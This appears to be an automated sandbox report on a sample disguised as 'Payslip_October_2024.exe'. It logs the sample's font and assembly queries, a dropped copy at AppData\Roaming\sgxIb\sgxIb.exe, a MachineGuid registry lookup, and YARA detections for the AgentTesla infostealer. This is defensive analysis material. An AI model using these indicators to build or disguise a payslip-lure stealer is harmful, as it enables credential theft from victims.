                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Users\user\Desktop\Payslip_October_2024.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE
